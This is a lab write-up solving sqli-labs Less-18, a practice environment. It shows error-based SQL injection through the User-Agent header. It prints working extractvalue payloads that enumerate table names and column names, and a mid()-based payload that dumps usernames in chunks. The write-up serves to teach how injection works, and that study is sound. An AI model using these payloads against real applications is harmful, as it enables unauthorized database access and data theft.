posture
This topic is User-Agent injection based on GET and error reporting, so it is necessary to construct a POC after the parameters
For the principle and attack posture of error injection, please refer to: [Network Security]sqli-labs Less-5 Problem-solving Analysis
This question is handled by packet capture
Determine the type of injection
As can be seen from the echo, the injection type is ('
injection
So the injected template is',1,1)#
Lookup table name
We take the first 1 as the injection point and construct the POC as follows:
',extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security'))),1)#
get four table names
Check column name
',extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))),1)#
check data
Introduce the mid() function
MID()
function is a string function that extracts a substring of a given string. Its syntax is as follows:
MID(str, start, length)
in:
str
is the source string from which to extract the substring.start
Specifies the starting position of the substring. It is an integer value indicating at which character in the source string to start extracting the substring. The starting position is counted from 1.length
Specifies the length of the substring to extract. It is also an integer value indicating how many characters to extract backwards from the starting position.
For example, if you have a string "Hello, World!"
, if you want to extract the substring "World"
, you can use the following MID()
function call:
MID("Hello,World!", 7, 5)
In this example, str
is the string "Hello, World!"
, start
is 7, length
is 5. Therefore, MID()
the function will extract a substring of length 5 starting from the 7th character, resulting in "World"
.
Let's take the username column as an example, and use the mid() function to construct the POC as follows:
',extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),1,32))),1)#
This statement is to get the username from the username column in the security.users table. What you get is not all the usernames, but a substring with a length of 32 starting from the first character.
Next, we extract the substring of length 32 starting at the 32nd character:
The POC is as follows:
',extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),32,32))),1)#'
Similarly, after changing 32 to 64, we get:
Summarize
以上为[网络安全]sqli-labs Less-18 解题详析,考察报错注入及相关函数的使用;后续将分享 [网络安全]sqli-labs Less-19 解题详析。
I am Qiu said , see you next time.